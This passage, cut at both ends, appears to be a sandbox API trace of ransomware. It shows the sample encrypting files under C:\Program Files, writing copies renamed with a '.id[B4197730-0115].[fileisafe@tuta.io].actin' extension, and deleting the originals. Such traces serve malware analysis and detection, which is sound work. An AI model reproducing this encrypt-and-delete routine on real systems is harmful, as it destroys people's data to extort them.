db\\sqloledb.rll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.942] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.943] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.943] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.943] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=326144) returned 1 [0148.943] CloseHandle (hObject=0x2f8) returned 1 [0148.943] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.dll")) returned 0x20 [0148.944] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.944] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.944] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.944] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.944] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=2560) returned 1 [0148.944] CloseHandle (hObject=0x2f8) returned 1 [0148.948] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll")) returned 0x20 [0148.948] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.949] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.949] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.949] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll" (normalized: "c:\\program files\\common files\\system\\wab32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.949] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=854528) returned 1 [0148.949] CloseHandle (hObject=0x2f8) returned 1 [0148.949] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll" (normalized: "c:\\program files\\common files\\system\\wab32.dll")) returned 0x20 [0148.950] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\wab32.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.950] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll" (normalized: "c:\\program files\\common files\\system\\wab32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.950] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.950] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll" (normalized: "c:\\program files\\common files\\system\\wab32res.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.951] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=964096) returned 1 [0148.951] CloseHandle (hObject=0x2f8) returned 1 [0148.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll" (normalized: "c:\\program files\\common files\\system\\wab32res.dll")) returned 0x20 [0148.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\wab32res.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.951] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll" (normalized: "c:\\program files\\common files\\system\\wab32res.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.951] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.951] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.951] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=174) returned 1 [0148.951] CloseHandle (hObject=0x2f8) returned 1 [0148.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini")) returned 0x26 [0148.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\desktop.ini.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.951] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.951] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0148.951] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0148.952] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\desktop.ini.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0148.952] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac30b0) returned 1 [0148.952] CryptSetKeyParam (hKey=0xac30b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0148.952] ReadFile (in: hFile=0x2f8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0xae, lpOverlapped=0x0) returned 1 [0148.953] CryptEncrypt (in: hKey=0xac30b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xb0) returned 1 [0148.953] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xb0, lpOverlapped=0x0) returned 1 [0148.954] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3130) returned 1 [0148.954] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0148.954] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0148.954] CryptDestroyKey (hKey=0xac3130) returned 1 [0148.954] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0148.954] CryptDestroyKey (hKey=0xac30b0) returned 1 [0148.954] CloseHandle (hObject=0x2f8) returned 1 [0148.954] CloseHandle (hObject=0x308) returned 1 [0148.954] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini")) returned 1 [0148.958] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.958] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\boating.exe" (normalized: "c:\\program files\\internet explorer\\boating.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0148.959] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=75776) returned 1 [0148.959] CloseHandle (hObject=0x308) returned 1 [0148.959] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\boating.exe" (normalized: "c:\\program files\\internet explorer\\boating.exe")) returned 0x20 [0148.959] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\boating.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\internet explorer\\boating.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.959] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\boating.exe" (normalized: "c:\\program files\\internet explorer\\boating.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0148.960] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0148.960] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0148.960] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\boating.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\internet explorer\\boating.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.960] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3130) returned 1 [0148.960] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0148.960] ReadFile (in: hFile=0x308, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x12800, lpOverlapped=0x0) returned 1 [0148.963] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x12810, dwBufLen=0x12810 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x12810) returned 1 [0148.963] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x12810, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x12810, lpOverlapped=0x0) returned 1 [0148.965] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac34b0) returned 1 [0148.965] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0148.965] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0148.965] CryptDestroyKey (hKey=0xac34b0) returned 1 [0148.965] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0148.965] CryptDestroyKey (hKey=0xac3130) returned 1 [0148.965] CloseHandle (hObject=0x308) returned 1 [0148.965] CloseHandle (hObject=0x2f8) returned 1 [0148.966] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\boating.exe" (normalized: "c:\\program files\\internet explorer\\boating.exe")) returned 1 [0148.967] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.967] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\hmmapi.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.968] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=2560) returned 1 [0148.968] CloseHandle (hObject=0x2f8) returned 1 [0148.968] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\hmmapi.dll.mui")) returned 0x20 [0148.968] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\internet explorer\\en-us\\hmmapi.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.968] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\hmmapi.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.968] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.968] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\ieinstal.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.969] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=2560) returned 1 [0148.969] CloseHandle (hObject=0x2f8) returned 1 [0148.969] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\ieinstal.exe.mui")) returned 0x20 [0148.969] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\internet explorer\\en-us\\ieinstal.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.969] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\ieinstal.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.969] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.969] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.970] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=5632) returned 1 [0148.970] CloseHandle (hObject=0x2f8) returned 1 [0148.970] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui")) returned 0x20 [0148.970] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.970] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.971] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.971] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ExtExport.exe" (normalized: "c:\\program files\\internet explorer\\extexport.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.971] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=53248) returned 1 [0148.971] CloseHandle (hObject=0x2f8) returned 1 [0148.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ExtExport.exe" (normalized: "c:\\program files\\internet explorer\\extexport.exe")) returned 0x20 [0148.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ExtExport.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\internet explorer\\extexport.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.972] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ExtExport.exe" (normalized: "c:\\program files\\internet explorer\\extexport.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.972] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.972] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll" (normalized: "c:\\program files\\internet explorer\\hmmapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.972] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=54272) returned 1 [0148.973] CloseHandle (hObject=0x2f8) returned 1 [0148.973] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll" (normalized: "c:\\program files\\internet explorer\\hmmapi.dll")) returned 0x20 [0148.973] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\internet explorer\\hmmapi.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll" (normalized: "c:\\program files\\internet explorer\\hmmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.973] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iediagcmd.exe" (normalized: "c:\\program files\\internet explorer\\iediagcmd.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.974] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=512000) returned 1 [0148.974] CloseHandle (hObject=0x2f8) returned 1 [0148.974] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iediagcmd.exe" (normalized: "c:\\program files\\internet explorer\\iediagcmd.exe")) returned 0x20 [0148.974] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iediagcmd.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\internet explorer\\iediagcmd.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.974] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iediagcmd.exe" (normalized: "c:\\program files\\internet explorer\\iediagcmd.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.974] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.974] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe" (normalized: "c:\\program files\\internet explorer\\ieinstal.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.975] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=501760) returned 1 [0148.975] CloseHandle (hObject=0x2f8) returned 1 [0148.975] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe" (normalized: "c:\\program files\\internet explorer\\ieinstal.exe")) returned 0x20 [0148.975] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\internet explorer\\ieinstal.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.975] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe" (normalized: "c:\\program files\\internet explorer\\ieinstal.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.975] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.975] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe" (normalized: "c:\\program files\\internet explorer\\ielowutil.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.976] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=224256) returned 1 [0148.976] CloseHandle (hObject=0x2f8) returned 1 [0148.976] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe" (normalized: "c:\\program files\\internet explorer\\ielowutil.exe")) returned 0x20 [0148.976] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\internet explorer\\ielowutil.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.976] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe" (normalized: "c:\\program files\\internet explorer\\ielowutil.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.977] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.977] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files\\internet explorer\\ieshims.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.977] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=407552) returned 1 [0148.977] CloseHandle (hObject=0x2f8) returned 1 [0148.978] GetFileAttributesW 